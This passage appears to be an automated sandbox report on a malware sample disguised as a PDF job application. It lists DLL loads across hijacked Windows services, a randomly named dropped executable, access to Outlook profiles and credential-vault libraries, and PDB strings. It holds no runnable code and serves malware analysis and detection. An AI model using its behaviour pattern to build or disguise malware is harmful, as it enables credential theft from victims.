            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: mfcore.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: mfplat.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: ksuser.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: mfperfhelper.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: rtworkq.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptionsimulationextensions.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: hid.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: holographicruntimes.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptiondevice.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: spatialstore.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: esent.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: analogcommonproxystub.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: capabilityaccessmanagerclient.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.devices.enumeration.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: structuredquery.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.globalization.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47mrm.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: icu.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: mswb7.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: devdispitemprovider.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: apphelp.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: libcrypto.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: esent.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: clusapi.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: fltlib.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: version.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: activeds.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: adsldpc.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: appmanagementconfiguration.dll
            Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
            Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
            Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
            Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
            Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
            Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
            Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
            Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
            Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
            Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
            Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
            Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
            Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\AppVClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: CV_Sales Representative - Job Request PDF.exeStatic file information: File size 1787392 > 1048576
            Source: CV_Sales Representative - Job Request PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000001.00000003.1762652955.0000000001CB0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1163189385.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000001.00000003.1831946567.0000000000660000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1822894017.0000000000940000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821670882.0000000000940000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdb source: armsvc.exe, 00000001.00000003.1240058581.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000001.00000003.1446513434.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000001.00000003.1309434456.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000001.00000003.1595997074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000001.00000003.1595997074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000001.00000003.1617904713.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdbGCTL source: armsvc.exe, 00000001.00000003.1240058581.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.1.dr
            Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000001.00000003.1872883015.0000000000980000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869670293.00000000009A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000001.00000003.1192730867.00000000019E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000B.00000003.2364725219.0000000000830000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerceptionSimulationService.pdb source: armsvc.exe, 00000001.00000003.1251228515.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: MFPMP.pdbUGP source: svchost.exe, 00000003.00000003.1319266499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1318579187.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1319168683.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2433723996.00000000013EE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1172554244.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1173875272.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1249385488.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1251663225.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1357310872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.00000000037EE000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1352886352.00000000032D4000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.0000000003650000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000001.00000003.1537138014.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.1.dr
            Source: Binary string: Spectrum.pdb source: Spectrum.exe.1.dr
            Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.1.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000001.00000003.1755290977.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: MsSense.pdbGCTL source: armsvc.exe, 00000001.00000003.1276391483.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: MsSense.pdb source: armsvc.exe, 00000001.00000003.1276391483.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000001.00000003.1856369751.0000000000900000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000001.00000003.1776380251.0000000000630000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1768773199.0000000000900000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: mfpmp.exe, 00000019.00000002.2422170365.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2458318969.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000000.1433430853.00000000030BC000.00000004.00000001.00040000.00000000.sdmp
            Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000001.00000003.1364309774.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: mfpmp.exe, 00000019.00000002.2422170365.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2458318969.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000000.1433430853.00000000030BC000.00000004.00000001.00040000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000001.00000003.1651749297.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatExe.pdb source: Acrobat.exe.1.dr
            Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000001.00000003.1457830708.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: Spectrum.pdbGCTL source: Spectrum.exe.1.dr
            Source: Binary string: locator.pdb source: armsvc.exe, 00000001.00000003.1271520679.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1265112613.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1179600004.0000000004220000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000001.00000003.1617904713.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000001.00000003.1468065367.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000001.00000003.1457830708.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000001.00000003.1831946567.0000000000660000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1822894017.0000000000940000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821670882.0000000000940000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000001.00000003.1537138014.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000001.00000003.1672499236.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000001.00000003.1446513434.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.1.dr
            Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000001.00000003.1872883015.0000000000980000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869670293.00000000009A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: msdtcexe.pdbGCTL source: armsvc.exe, 00000001.00000003.1234642578.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.1737896390.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000001.00000003.1251228515.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000001.00000003.1289023903.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000001.00000003.1229505191.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000001.00000003.1263407309.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1256719889.0000000002020000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1257623282.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000001.00000003.1856369751.0000000000900000.00000004.00001000.00020000.00000000.sdmp
